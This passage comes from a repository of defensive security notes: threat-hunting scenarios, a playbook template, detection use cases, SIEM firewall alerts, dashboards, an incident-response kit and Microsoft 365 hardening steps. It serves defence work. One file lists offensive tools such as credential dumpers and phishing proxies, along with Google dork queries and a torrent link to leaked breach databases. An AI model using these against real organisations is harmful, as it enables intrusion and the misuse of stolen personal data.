that are similar to existing system binaries to avoid detection. 73 | - An adversary is using fileless malware based on memory injections to avoid detection of malware on disk. 74 | - An adversary is using persistence mechanisms without adding files to the operating system. 75 | - An adversary is using Kerberoasting attack techniques to obtain valid credentials. 76 | 77 | 78 | 79 | 80 | # Resources 81 | - https://hackforlab.com/threat-hunting-scenario/ 82 | - https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf 83 | - https://www.betaalvereniging.nl/en/safety/tahiti/ 84 | - https://securityintelligence.com/posts/threat-hunting-guide/ 85 | - https://www.ibm.com/topics/threat-hunting 86 | -------------------------------------------------------------------------------- /Use-Case-Structure.md: -------------------------------------------------------------------------------- 1 | (AKA Playbook) 2 | 3 | # Executive Summary 4 | [Provide non-technical, high-level information, references, and background.] 5 | 6 | ## Name 7 | [Provide a succinct statement that describes what the Use Case addresses (e.g. Antivirus Detection Alert).] 8 | 9 | ## Problem Statement 10 | [Describe the problem, beginning with any necessary background information.] 11 | 12 | ## Objectives 13 | [Define the goals of the Use Case.] 14 | 15 | ## Compliance 16 | [List the Compliance Framework and individual checks/requirements the Use Case relates to in bulleted format.] 17 | 18 | ## MITRE ATT&CK Framework 19 | [List the MITRE ATT&CK Framework Tactics/Techniques the Use Case relates to in bulleted format.] 20 | 21 | ## Assumptions and Limitations 22 | [Describe any assumptions/limitations regarding law, licensing, policies, or technicalities.] 23 | 24 | # Analysis 25 | [Provide insights on the actions of and tools for those who are expected to monitor and respond.] 26 | 27 | ## Detection Validation 28 | [Describe expected paths that would lead to this Use Case being identified as the proper course of action/response. Include steps to validate true or false positive and whether Containment, Remediation, and Recovery steps are necessary. List specific monitors, dashboards, reports, automated emails, alerts, etc. In cases where a user may provide the initial notification, provide language to look for. e.g.: 29 | - A call from a user referencing a Symantec Antivirus popup or window. 30 | - An email from a System Administrator citing an antivirus alert in Symantec Manager.] 31 | 32 | ## Recommended Response Action(s) 33 | 34 | ### Identification 35 | [Provide recommended actions that determine investigation scope, collect, and preserve data, and perform technical analysis, when, where, and who to escalate to.] 36 | 37 | ### Containment 38 | [Provide recommended actions that limit the impact and spread of the situation.] 39 | 40 | ### Eradication & Recovery 41 | [Provide steps to determine whether a system can be restored after cleanup versus requiring reimaging, disk replacement, or entire system replacement. Provide recommend actions to eradicate all artifacts revert all changes to the system when viable, including how to validate those actions taken.] 42 | 43 | # References and Resources 44 | [Provide any useful resources or references that can help understand the vulnerability, attack, detection, affected software, protocols, etc. Usually in the form of URLs with page names (in case the Website owner restructure their links, like Microsoft does often.] 45 | 46 | 47 | 48 | 49 | References (for this template) 50 | - Don Murdoch's Blue Team Handbook (2018) 51 | - https://www.cisa.gov/sites/default/files/2024-08/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf 52 | - https://github.com/socfortress/Playbooks/blob/main/IRP-TEMPLATE.md -------------------------------------------------------------------------------- /Use-Cases.md: -------------------------------------------------------------------------------- 1 | Signatures should be mapped to use cases based on grouping that makes sense. This mapping allows the investigator to review recommended response actions. A good start would be using MITRE ATT&CK framework Tactics as Use Cases for signatures. 2 | 3 | These less-technical use cases should also be considered for addition into your use case library: 4 | - The mouse and/or keyboard start moving/typing on their own. (https://attack.mitre.org/techniques/T1021/) 5 | - A device performs unexpected functions on its own (like a gate opening or closing unexpectedly). 6 | - An endpoint computer fails to boot up properly. 7 | - A ransomware message is displayed. (https://attack.mitre.org/techniques/T1486/) 8 | - A caller claims to be the helpdesk or other member of IT Staff. (https://attack.mitre.org/techniques/T1656) 9 | - An unidentified peripheral (like a USB) is found connected to a system. (https://attack.mitre.org/techniques/T1091/) 10 | - An email or document suggests calling a provided phone number for support (e.g. Microsoft). (https://attack.mitre.org/techniques/T1566/) 11 | - Historic events are seemingly deleted or otherwise no longer available. (https://attack.mitre.org/techniques/T1070/) 12 | - Unauthorized changes appear to have been made to a device's logic code/configuration. (https://attack.mitre.org/techniques/T0845/) 13 | - A secure location shows clear signs of breaking and entering. 14 | - An unauthorized person is found in a location. 15 | - An antivirus/antimalware product presents a detection alert. 16 | -------------------------------------------------------------------------------- /UseCases/Detect-Password-Spraying-via-Windows-Events.md: -------------------------------------------------------------------------------- 1 | # Executive Summary 2 | 3 | Adversaries may attempt to creatively brute force many accounts on a network by increasing the time between logon attempts, preventing automatic account locking. Since waiting more time impacts speed of the attack, adversaries typically target more than one account simultaneously. 4 | 5 | ## Name 6 | 7 | Detect Password Spraying via Windows Events 8 | 9 | 10 | ## Problem Statement 11 | 12 | Password spraying targets the human tendency to both use weak password and reuse them. Adversaries attempt to avoid brute force detection and prevention by increasing time between password attempts. To account for the significant reduction in the speed of the attack, multiple accounts are targeted in parallel. Each of these parallel attacks are progressed slow enough to keep the account from reaching the failed attempts lockout policy. 13 | 14 | 15 | ## Objectives 16 | 17 | - Detect low and slow brute force method known as password spraying. 18 | 19 | 20 | ## Compliance 21 | 22 | . 23 | 24 | 25 | ## Mitre ATT&CK Framework 26 | 27 | - Credential Access https://attack.mitre.org/tactics/TA0006/ 28 | - Brute Force https://attack.mitre.org/techniques/T1110/ 29 | 30 | 31 | ## Assumptions and Limitations 32 | 33 | . 34 | 35 | 36 | # Analysis 37 | 38 | Password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. 39 | 40 | 41 | ## Monitoring and Notifications 42 | 43 | . 44 | 45 | 46 | ## Recommended Response Action(s) 47 | 48 | - Determine source and destination account/systems 49 | - Collect and analyze surrounding events 50 | - Issue password change requirement to account owner(s) 51 | - Determine if source/destination accounts/systems are compromised 52 | - Consider quarantining, isolating, or disabling compromised accounts/systems 53 | 54 | 55 | # Engineering 56 | 57 | . 58 | 59 | 60 | ## Component Names 61 | 62 | 63 | 64 | ## Data Stream Analysis 65 | 66 | - Windows Security Event ID 4624 67 | - Windows Security Event ID 4625 68 | - Windows Security Event ID 4648 69 | 70 | 71 | ## Assurance Metrics 72 | 73 | . -------------------------------------------------------------------------------- /UseCases/Layer3-Firewall.md: -------------------------------------------------------------------------------- 1 | TODO: Merge into Tactics md's 2 | 3 | SIEM Use Cases based on Layer 3 Firewalls 4 | - [Traffic from Printers to Servers/Workstations](#traffic-from-printers-to-serversworkstations) 5 | - [Traffic from Servers to Workstations](#traffic-from-servers-to-workstations) 6 | - [Traffic from Workstations to Workstations](#traffic-from-workstations-to-workstations) 7 | - [Unauthorized Egress DNS Traffic](#unauthorized-egress-dns-traffic) 8 | - [Unauthorized Egress NTP Traffic](#unauthorized-egress-ntp-traffic) 9 | - [OS Update Requests to Non-Company Servers](#os-update-requests-to-non-company-servers) 10 | - [Newly Observed Port Use](#newly-observed-port-use) 11 | - [Known-bad Port Observed](#known-bad-port-observed) 12 | - [Known-bad IP Address Observed](#known-bad-ip-address-observed) 13 | - [Newly observed UDP Traffic](#newly-observed-udp-traffic) 14 | - [Spike in Outbound Denies](#spike-in-outbound-denies) 15 | - [Spike in Egress Sessions](#spike-in-egress-sessions) 16 | - [Anomalous Upload/Download Ratio](#anomalous-uploaddownload-ratio) 17 | - [Unauthorized Egress Email Traffic](#unauthorized-egress-email-traffic) 18 | - [Unauthorized Egress Web Requests](#unauthorized-egress-web-requests) 19 | - [Border Firewall Egress Default Deny Blocks](#border-firewall-egress-default-deny-blocks) 20 | 21 | # Traffic from Printers to Servers/Workstations 22 | - Blacklist Alert 23 | 24 | 25 | # Traffic from Servers to Workstations 26 | - Blacklist Alert 27 | 28 | 29 | # Traffic from Workstations to Workstations 30 | - Rolling Whitelist Alert 31 | 32 | 33 | # Unauthorized Egress DNS Traffic 34 | - Blacklist Alert 35 | - Port 53 36 | - Could indicate DNS Tunneling 37 | 38 | 39 | # Unauthorized Egress NTP Traffic 40 | - Blacklist Alert 41 | - Port 123 42 | 43 | 44 | # OS Update Requests to Non-Company Servers 45 | - Blacklist Alert 46 | - Accessing default Windows, Ubuntu, etc update IP addresses could indicate a rogue device 47 | 48 | 49 | # Newly Observed Port Use 50 | - Rolling Whitelist Alert 51 | - Ideally separate system types into different rolling whitelists (printers, servers, workstations) 52 | 53 | 54 | # Known-bad Port Observed 55 | - Blacklist Alert 56 | 57 | 58 | # Known-bad IP Address Observed 59 | - Blacklist Alert 60 | 61 | 62 | # Newly observed UDP Traffic 63 | - Rolling Whitelist Alert 64 | 65 | 66 | # Spike in Outbound Denies 67 | - Threshold Alert 68 | 69 | 70 | # Spike in Egress Sessions 71 | - Threshold Alert 72 | 73 | 74 | # Anomalous Upload/Download Ratio 75 | - Threshold Alert 76 | 77 | 78 | # Unauthorized Egress Email Traffic 79 | - Blacklist Alert 80 | - Ports include 25, 143, 587, 110, etc 81 | 82 | # Unauthorized Egress Web Requests 83 | - Not originating from company proxy 84 | - Blacklist 85 | 86 | 87 | # Border Firewall Egress Default Deny Blocks 88 | - Rolling Whitelist Alert 89 | 90 | -------------------------------------------------------------------------------- /UseCases/Layer7-Firewall.md: -------------------------------------------------------------------------------- 1 | TODO: Merge into Tactics md's 2 | 3 | SIEM Use Cases for Layer 7 Firewalls. Note that Layer 3 Firewall use cases also apply here. 4 | 5 | - [Abnormal Expired Certificates](#abnormal-expired-certificates) 6 | - [Abnormal Self-Signed Certificates](#abnormal-self-signed-certificates) 7 | - [Abnormal certificate Algorithms/Sizes](#abnormal-certificate-algorithmssizes) 8 | - [Abnormal Certificates Validity Length](#abnormal-certificates-validity-length) 9 | - [Certificates with Abnormal Common Name Fields](#certificates-with-abnormal-common-name-fields) 10 | - [Certificates with Blank Fields that are Commonly Filled](#certificates-with-blank-fields-that-are-commonly-filled) 11 | - [Certificates with Invalid Country Codes / States](#certificates-with-invalid-country-codes--states) 12 | - [Newly-observed Protocol in Use](#newly-observed-protocol-in-use) 13 | - [Protocol Use Over Non-Standard Port](#protocol-use-over-non-standard-port) 14 | - [Web requests Directly to IP Address](#web-requests-directly-to-ip-address) 15 | - [Newly Observed File Transfer Protocol Use](#newly-observed-file-transfer-protocol-use) 16 | - [Unauthorized X-Forwarded-For Address](#unauthorized-x-forwarded-for-address) 17 | 18 | # Abnormal Expired Certificates 19 | - Aggregate Count 20 | 21 | 22 | # Abnormal Self-Signed Certificates 23 | - Aggregate Count 24 | 25 | 26 | # Abnormal certificate Algorithms/Sizes 27 | - Aggregate Count 28 | 29 | 30 | # Abnormal Certificates Validity Length 31 | - Blacklist Alert 32 | - Suggest looking for 5 years and older 33 | 34 | 35 | # Certificates with Abnormal Common Name Fields 36 | - Blacklist Alert 37 | 38 | 39 | # Certificates with Blank Fields that are Commonly Filled 40 | - Blacklist Alert 41 | 42 | 43 | # Certificates with Invalid Country Codes / States 44 | - Blacklist Alert 45 | 46 | 47 | # Newly-observed Protocol in Use 48 | - Rolling Whitelist 49 | 50 | 51 | # Protocol Use Over Non-Standard Port 52 | - Blacklist 53 | 54 | 55 | # Web requests Directly to IP Address 56 | - Blacklist Alert 57 | - AKA Naked IP 58 | 59 | 60 | # Newly Observed File Transfer Protocol Use 61 | - Rolling Whitelist Alert 62 | - FTP, TFTP, SSH, etc 63 | 64 | # Unauthorized X-Forwarded-For Address 65 | - X-Forwarded-For specifies the proxy forwarding 66 | - Blacklist -------------------------------------------------------------------------------- /attack-tools-resources.md: -------------------------------------------------------------------------------- 1 | - [Common Tools Used by Adversaries](#common-tools-used-by-adversaries) 2 | - [Discovery (Passive)](#discovery-passive) 3 | - [Google Dorking](#google-dorking) 4 | - [Breach Databases](#breach-databases) 5 | - [Discovery (Active)](#discovery-active) 6 | - [Credential Access](#credential-access) 7 | - [Attack Demonstrations](#attack-demonstrations) 8 | - [Open Source Attacker Simulation Tools](#open-source-attacker-simulation-tools) 9 | 10 | # Common Tools Used by Adversaries 11 | 12 | Study these tools to find new ways to discover/defend against. 13 | 14 | - TokenPlayer - https://github.com/S1ckB0y1337/TokenPlayer 15 | - crackmapexec - https://github.com/byt3bl33d3r/CrackMapExec 16 | - impacket - https://github.com/SecureAuthCorp/impacket 17 | - Especially secretsdump.py 18 | - Basically anything in Kali Linux - https://www.kali.org/ 19 | - pingcastle - https://github.com/vletoux/pingcastle 20 | - mimikatz - https://github.com/gentilkiwi/mimikatz * 21 | - Kerberoast - https://github.com/nidem/kerberoast * 22 | - hashchat - https://github.com/hashcat/hashcat 23 | - Burp Suite - https://portswigger.net/burp/communitydownload 24 | - Request Smuggler plugin 25 | - openvas - https://github.com/greenbone/openvas 26 | - autossh - www.harding.motd.ca/autossh/ 27 | - dirb - http://dirb.sourceforge.net/ 28 | - evilginx2 - https://github.com/kgretzky/evilginx2 29 | - chashell - https://github.com/sysdream/chashell 30 | - Exchange Web Services (EWS) Crack - https://github.com/mikesiegel/ews-crack 31 | - Okta Password Sprayer - https://github.com/Rhynorater/Okta-Password-Sprayer 32 | - CQHashDumpV2 - https://cqureacademy.com/blog/identity-theft-protection/pass-hash-attack-tutorial 33 | - Rubeus - https://github.com/GhostPack/Rubeus 34 | - Seatbelt - https://github.com/ghostpack/seatbelt 35 | - evilClippy - https://github.com/outflanknl/EvilClippy 36 | - proxychains - https://github.com/haad/proxychains 37 | 38 | ## Discovery (Passive) 39 | Stuff you probably won't see on your network, but could use "against yourself" 40 | - hardcidr - https://github.com/trustedsec/hardcidr 41 | - amass - https://github.com/caffix/amass 42 | - PowerMeta - https://github.com/dafthack/PowerMeta 43 | - truffleHog - https://github.com/dxa4481/truffleHog 44 | - reposcanner - https://github.com/Dionach/reposcanner 45 | 46 | ### Google Dorking 47 | - yourdomain.com (site:amazonaws.com | site:blob.core.windows.net | site:digitaloceanspaces.com) 48 | - yourdoamin.com (site:pastebin.com | site:paste2.org | site:paste.bradleygill.com | site:pastie.org | site:dpaste.org) 49 | - "your company" site:linkedin.com (intitle:"Service Desk" | intitle:"Desktop Support" | intitle:"Security Engineer" | intitle:"Help Desk") 50 | 51 | ### Breach Databases 52 | - https://thepiratebay.org/torrent/22590240/Leaked_Databases 53 | 54 | ## Discovery (Active) 55 | You might see some of this 56 | - aquatone - https://github.com/michenriksen/aquatone 57 | - dirsearch - https://github.com/maurosoria/dirsearch 58 | - nmap - https://nmap.org/ 59 | - bloodhound - https://github.com/BloodHoundAD/BloodHound 60 | 61 | ## Credential Access 62 | - CleverSpray - https://github.com/wavestone-cdt/Invoke-CleverSpray 63 | 64 | # Attack Demonstrations 65 | - Netwrix Attack Catalog https://www.netwrix.com/attack.html 66 | 67 | # Open Source Attacker Simulation Tools 68 | 69 | - Atomic Red Team 70 | - https://github.com/redcanaryco/atomic-red-team 71 | - Mordor 72 | - https://github.com/hunters-forge/mordor 73 | - EVTX Attack Samples 74 | - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES 75 | - Caldera 76 | - https://github.com/mitre/caldera 77 | - Metta 78 | - https://github.com/uber-common/metta 79 | - APT Simulator 80 | - https://github.com/NextronSystems/APTSimulator 81 | - Red Team Automation 82 | - https://github.com/endgameinc/RTA 83 | - Infection Monkey 84 | - https://github.com/guardicore/monkey 85 | - Blue Team Training Toolkit (BT3) 86 | - https://www.encripto.no/en/downloads-2/tools/ 87 | - DumpsterFire 88 | - https://github.com/TryCatchHCF/DumpsterFire 89 | - AutoTTP 90 | - https://github.com/jymcheong/AutoTTP 91 | - NSA Unfetter 92 | - https://mitre.github.io/unfetter/ 93 | - MATE MITRE ATT&CK Technique Emulation 94 | - https://github.com/fugawi/mate 95 | - Purple Team ATT&CK Automation 96 | - https://github.com/praetorian-inc/purple-team-attack-automation 97 | 98 | 99 | * - Implementation attack, unlikely to be patched traditionally. -------------------------------------------------------------------------------- /dashboards.md: -------------------------------------------------------------------------------- 1 | These dashboard/widget suggestions are high level, meant to be used to get off on the right foot and to inspire further development. 2 | 3 | ## Long Tail Analysis 4 | - All should be displayed as count of aggregated events in a bar charts. 5 | - Generally, the purpose is to identify unique occurrences in a data set visually, by inspecting the "Long Tail" of unique events. 6 | - The most interesting events here are the unique items at the end of the chart, but sometimes can be the largest items at the beginning. 7 | 8 | | Data Source | Filters | Agregated Columns | 9 | | ---------------------- | -------------------------------------------- | -------------------------------- | 10 | | Host-Based IPS | | Threat Source Process Name | 11 | | Host-Based IPS | | Detecting Hostname | 12 | | Host-Based IPS | | Threat Source Username | 13 | | Data Loss Protection | | Destination/Device Type | 14 | | Rogue System Deteciton | | Hostname | 15 | | Virus Engine | | Alert Name | 16 | | Virus Engine | | Process Name | 17 | | Firewall | Outbound connections on uncommon ports | Destination IP, destination port | 18 | | Web Proxy | Web Traffic | Destination Domain | 19 | | Firewall | Outbound SMTP traffic NOT from Mail gateways | Destination, Port | 20 | | Firewall | Inbound Blocks | Source, Destination, Port | 21 | | Firewall | Outbound Blocks | Source, Destination, Port | 22 | | Windows Event Logs | Non-Interactive logon on User accounts | Username | 23 | | Windows Event Logs | Interactive Logon on Privileged Accounts | Username | 24 | | Windows Event Logs | Interactive logon on Service accounts | Username | 25 | | Web Proxy | Interaction with IP addresses (not a domain) | Full URL | 26 | | Network Appliances | Change-notification on Cisco devices | Username | 27 | | Web Server | Web Request 200, 404 | Requested Address | 28 | | Windows Event Logs | Service or Schedule Task Creation | Service or Task Name, Filepath | 29 | 30 | -------------------------------------------------------------------------------- /field-kit.md: -------------------------------------------------------------------------------- 1 | (AKA incident response kit, bugout bag, flyaway kit, go bag, deployment kit, jump bag, rapid response kit) 2 | 3 | Individual Kit 4 | - Any necessary Personal Protective Equipment (PPE) 5 | - Notetaking materials 6 | - Audio recording capability 7 | - Photography capability 8 | - Analysis laptop (with authorized, preinstalled, and tested forensic tools and playbooks per Incident Response Plan) 9 | 10 | Team Kit 11 | - Kit should be in one or more containers with wheels. 12 | - Flashlight (headlamp style) 13 | - Spare batteries or rechargeable 14 | - Multitool 15 | - Electronics Components 16 | - Electronics screwdriver set 17 | - Antistatic protection wrist strap and pad 18 | - Electronics Vacuum (antistatic) 19 | - digital multimeter 20 | - Power Components 21 | - 2x USB-A Chargers (3amps+) 22 | - 2x 20ft+ extension cords 23 | - 2x power strips (with surge protection) 24 | - Wiring Components 25 | - Universal USB Conversion Kit 26 | - USB Micro to USB A Wire 27 | - USB C to USB A Wire 28 | - USB-A Extension Wire 29 | - USB Hub (with external power) 30 | - USB to Ethernet adapter 31 | - USB to Serial adapter 32 | - Networking Components 33 | - Ethernet cable 34 | - Ethernet crossover adapter or cable 35 | - 5+ port managed switched (with port spanning) 36 | - 5 port hub (unmanaged) 37 | - Ethernet cable testers / Wire Tracker kit 38 | - Ethernet cable crimper 39 | - RJ-45 connectors 40 | - Forensics Components 41 | - Digital evidence bags and tags 42 | - Chain of custody forms as specified by Incident Response Plan 43 | - USB 3.1 Write Blocker 44 | - Drive Components 45 | - 2x External hard drives (5 TB+ storage, USB-3.0+, hardware-encryption compatible) 46 | - 2x External "thumbsticks" (1TB+ storage, USB 3.0+) 47 | - 2x SATA to External USB Adapter/Enclosure/Dock (USB 3.0+) 48 | - 2x IDE to External USB Adapter/Enclosure/Dock (USB 3.0+) 49 | - 2x NVMe to USB Adapter/Enclosure/Dock (USB 3.0+) 50 | - External DVD-R Drive 51 | - Blank DVD-Rs 52 | - Server Room Components 53 | - StarTech.com USB Crash Cart Adapter 54 | - 2x Foldable Stools (with back rest) 55 | - Long-haul Components 56 | - Emergency Food Supply (non-perishable meals, long shelf life) 57 | - 2+ tableware sets (spoon, fork, knife, bowl, cup, plate) 58 | - Water boiler 59 | -------------------------------------------------------------------------------- /hardening/dns-security.md: -------------------------------------------------------------------------------- 1 | - Regularly review DNS records for proper resolution, or build signatures to detect. 2 | - Use Multifactor Authentication for all accounts that can make changes to DNS records 3 | - Monitor certificate transparency logs for newly added certificates, or build signatures to detect. 4 | -------------------------------------------------------------------------------- /hardening/email-security.md: -------------------------------------------------------------------------------- 1 | # Utilize Spam/Phish Filtering 2 | Enable strong spam filters to prevent phishing emails from reaching end users. 3 | 4 | # User Training 5 | Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments. 6 | 7 | # Attachment Filtering 8 | Filter emails containing executable files to prevent them from reaching end users. -------------------------------------------------------------------------------- /hardening/general-security.md: -------------------------------------------------------------------------------- 1 | # Apply defense-in-depth principles 2 | - by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions. 3 | 4 | # Resources 5 | - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a?mc_cid=78cd2ac95a&mc_eid=UNIQID -------------------------------------------------------------------------------- /hardening/microsoft-365-auditing-and-reporting.md: -------------------------------------------------------------------------------- 1 | - [Enable Audit Log Search](#enable-audit-log-search) 2 | - [Enable Mailbox Auditing for All Users](#enable-mailbox-auditing-for-all-users) 3 | - [Review Role Changes Weekly](#review-role-changes-weekly) 4 | - [Review Mailbox Forwarding Rules Weekly](#review-mailbox-forwarding-rules-weekly) 5 | - [Review the Mailbox Access by Non-Owners Report Bi-Weekly](#review-the-mailbox-access-by-non-owners-report-bi-weekly) 6 | - [Review the Malware Detections Report Weekly](#review-the-malware-detections-report-weekly) 7 | - [Review your Account Provisioning Activity Report Weekly](#review-your-account-provisioning-activity-report-weekly) 8 | - [Additional Resources](#additional-resources) 9 | 10 | # Enable Audit Log Search 11 | 12 | # Enable Mailbox Auditing for All Users 13 | 14 | # Review Role Changes Weekly 15 | 16 | # Review Mailbox Forwarding Rules Weekly 17 | 18 | # Review the Mailbox Access by Non-Owners Report Bi-Weekly 19 | 20 | # Review the Malware Detections Report Weekly 21 | 22 | # Review your Account Provisioning Activity Report Weekly 23 | 24 | 25 | # Additional Resources 26 | - https://usc.pax8.com/resource/display/33588 27 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 28 | -------------------------------------------------------------------------------- /hardening/microsoft-365-azure-ad.md: -------------------------------------------------------------------------------- 1 | - [Enable MFA](#enable-mfa) 2 | - [Enable MFA For Just Admins](#enable-mfa-for-just-admins) 3 | - [Block Legacy Authentication](#block-legacy-authentication) 4 | - [Enable Self-Service Password Reset](#enable-self-service-password-reset) 5 | - [Do Not Expire Passwords](#do-not-expire-passwords) 6 | - [Delete/block accounts not used in last 30 days](#deleteblock-accounts-not-used-in-last-30-days) 7 | - [Designate More than 1 Global Admin but fewer than 5](#designate-more-than-1-global-admin-but-fewer-than-5) 8 | - [Do not allowusers to grant consent to unmanaged applications](#do-not-allowusers-to-grant-consent-to-unmanaged-applications) 9 | - [Additional Resources](#additional-resources) 10 | 11 | # Enable MFA 12 | 13 | Security defaults make it easier to help protect your organization from these attacks with preconfigured security settings: 14 | - Requiring all users to register for Azure AD Multi-Factor Authentication. 15 | - Requiring administrators to perform multi-factor authentication. 16 | - Blocking legacy authentication protocols. 17 | - Requiring users to perform multi-factor authentication when necessary. 18 | - Protecting privileged activities like access to the Azure portal. 19 | 20 | Compliance Controls: 21 | - CSA CCM301; Control DSI-02 22 | - FedRAMP Moderate; Control IA-3 23 | - GDPR; Control 6.6.5 24 | - ISO 27018:2014; Control C.9.4.2, Control A.10.8 25 | - NIST 800-171; Control 3.5.2 26 | - NIST 800-53; Control IA-3 27 | 28 | To enable security defaults in your directory: 29 | - Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator. 30 | - Browse to Azure Active Directory > Properties. 31 | - Select Manage security defaults. 32 | - Set the Enable security defaults toggle to Yes. 33 | - Select Save. 34 | 35 | ## Enable MFA For Just Admins 36 | To create an MFA conditional access policy in your directory for admins: 37 | - Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator. 38 | - Browse to Azure Active Directory > Security. 39 | - Browse to Protect > Conditional Access 40 | - Click New Policy 41 | - Give the policy a name and under the users and groups blade select Directory Roles. From the drop down, select Global Administrator at a minimum. Add other privileged roles like User Administrator or Security Administrator. 42 | - Select All Cloud Apps 43 | - Skip the conditions section and in the Grant section,select Require Multi-factor Authentication 44 | - Enable the policy and click Create 45 | 46 | # Block Legacy Authentication 47 | Legacy authentication is more susceptible to password spray attacks or brute force attacks because you cannot layer on MFA. It is advised to block all legacy authentication methods. Note that if you have any printers/copiers/scanners or IMAP accounts used for ticketing, you should update those protocols before blocking legacy auth. 48 | 49 | To block legacy authentication via security defaults in your directory: 50 | - Ensure Security Defaults are enabled (see above) 51 | - Sign in to the Azure portal as a security administrator, Conditional Access administrator, or global administrator. 52 | - Browse to Azure Active Directory > Security. 53 | - Browse to Protect > Conditional Access 54 | - Click New Policy 55 | - Name your policy and scope to all users 56 | - In the Cloud apps or actions blade, click All cloud apps. 57 | - *NOTE* If you do have applications that use legacy auth, you could exclude them here to give yourself more time to update the protocol 58 | - In the conditions section, click Client Apps > Mobile Apps and Desktop Clients > Other Clients 59 | - In the Grant blade, leave the setting at Block Access 60 | - Enable the policy and click Create 61 | 62 | 63 | # Enable Self-Service Password Reset 64 | - Go to the Azure Active Directory Admin Portal and click on the Password Reset 65 | - Enable for All users or use Selected to exclude some user groups 66 | - In the Authentication Methods tab, define settings users may put in place. These may be the same selected for MFA, with the addition of "Security questions" 67 | - In the Registration tab, define the number of days before users are asked to confirm their recovery options and also get alerts if you want to know when someone has reset their password. 68 | 69 | # Do Not Expire Passwords 70 | 71 | Compliance Controls 72 | - FedRAMP Moderate; Control AC-7(a) 73 | - NIST 800-171; Control 3.1.8 74 | - NIST 800-53; Control AC-7(a) 75 | 76 | # Delete/block accounts not used in last 30 days 77 | 78 | Compliance Controls 79 | - FedRAMP Moderate; Control AC-2(3) 80 | - NIST 800-53; Control AC-2(3) 81 | 82 | # Designate More than 1 Global Admin but fewer than 5 83 | 84 | Compliance Controls 85 | - CSA CCM301; Control DSI-02 86 | - FedRAMP Moderate; Control IA-3 87 | - GDPR; Control 6.6.5 88 | - ISO 27018:2014; Control C.9.4.2, Control A.10.8 89 | - NIST 800-171; Control 3.5.2 90 | - NIST 800-53; Control IA-3 91 | 92 | # Do not allowusers to grant consent to unmanaged applications 93 | 94 | Compliance Controls 95 | - FedRAMP Moderate; Control CM-8(3)(a) 96 | - NIST 800-53; Control CM-8(3)(a) 97 | - NIST CSF; Control ID.AM-1 98 | 99 | 100 | # Additional Resources 101 | - https://usc.pax8.com/resource/display/33588 102 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 103 | -------------------------------------------------------------------------------- /hardening/microsoft-365-exchange.md: -------------------------------------------------------------------------------- 1 | - [Enable Email Encryption](#enable-email-encryption) 2 | - [Enable Client Rules Forwarding Blocks](#enable-client-rules-forwarding-blocks) 3 | - [Set Outbound Spam Notifications](#set-outbound-spam-notifications) 4 | - [Do not allow mailbox delegation](#do-not-allow-mailbox-delegation) 5 | - [Set up Connection Filtering](#set-up-connection-filtering) 6 | - [Spam Filtering](#spam-filtering) 7 | - [Malware Protection](#malware-protection) 8 | - [Anti-Phishing Policy](#anti-phishing-policy) 9 | - [Configure Enhanced Filtering](#configure-enhanced-filtering) 10 | - [Configure ATP Safe Links and Safe Attachments Policy](#configure-atp-safe-links-and-safe-attachments-policy) 11 | - [Add SPF, DKIM, and DMARC](#add-spf-dkim-and-dmarc) 12 | - [Do not Allow Calendar Details Sharing](#do-not-allow-calendar-details-sharing) 13 | - [Audits](#audits) 14 | - [Additional Resources](#additional-resources) 15 | 16 | # Enable Email Encryption 17 | 18 | # Enable Client Rules Forwarding Blocks 19 | 20 | 21 | Compliance Controls 22 | - GDPR; Control 6.8.2 23 | - ISO 27018:2014; Control A.10.2 24 | 25 | # Set Outbound Spam Notifications 26 | 27 | Compliance Controls 28 | - HIPAA; Control 45 C.F.R. § 164.308(a)(5)(ii)(B) 29 | - NIST 800-171; Control 3.14.2 30 | - NIST 800-53; Control SI-3(a) 31 | 32 | 33 | # Do not allow mailbox delegation 34 | 35 | Compliance Controls 36 | - FedRAMP Moderate; Control AC-2, Control AC-2(3) 37 | - GDPR; Control 6.6.1 38 | - ISO 27018:2014; Control C.9.2 39 | - NIST 800-53; Control AC-2 40 | - NIST CSF; Control DE.CM-1 41 | 42 | 43 | # Set up Connection Filtering 44 | 45 | 46 | # Spam Filtering 47 | 48 | 49 | # Malware Protection 50 | 51 | 52 | # Anti-Phishing Policy 53 | 54 | 55 | # Configure Enhanced Filtering 56 | 57 | 58 | 59 | # Configure ATP Safe Links and Safe Attachments Policy 60 | 61 | 62 | # Add SPF, DKIM, and DMARC 63 | 64 | 65 | # Do not Allow Calendar Details Sharing 66 | 67 | Compliance Controls 68 | - FedRAMP Moderate; Control AC-2(9) 69 | - NIST 800-53; Control AC-2(9) 70 | 71 | 72 | # Audits 73 | - Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes. 74 | 75 | # Additional Resources 76 | - https://usc.pax8.com/resource/display/33588 77 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 78 | -------------------------------------------------------------------------------- /hardening/microsoft-365-sharepoint-and-onedrive.md: -------------------------------------------------------------------------------- 1 | - [Configure Expiration Time for External Sharing Links](#configure-expiration-time-for-external-sharing-links) 2 | - [Enable Versioning on all SharePoint Online Document Libraries](#enable-versioning-on-all-sharepoint-online-document-libraries) 3 | - [Adopt the OneDrive Sync Client](#adopt-the-onedrive-sync-client) 4 | - [Additional Resources](#additional-resources) 5 | 6 | # Configure Expiration Time for External Sharing Links 7 | 8 | # Enable Versioning on all SharePoint Online Document Libraries 9 | 10 | # Adopt the OneDrive Sync Client 11 | 12 | 13 | # Additional Resources 14 | - https://usc.pax8.com/resource/display/33588 15 | - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults 16 | -------------------------------------------------------------------------------- /hardening/microsoft-365-teams.md: -------------------------------------------------------------------------------- 1 | - [Utilize Private Channels](#utilize-private-channels) 2 | - [Block External Access](#block-external-access) 3 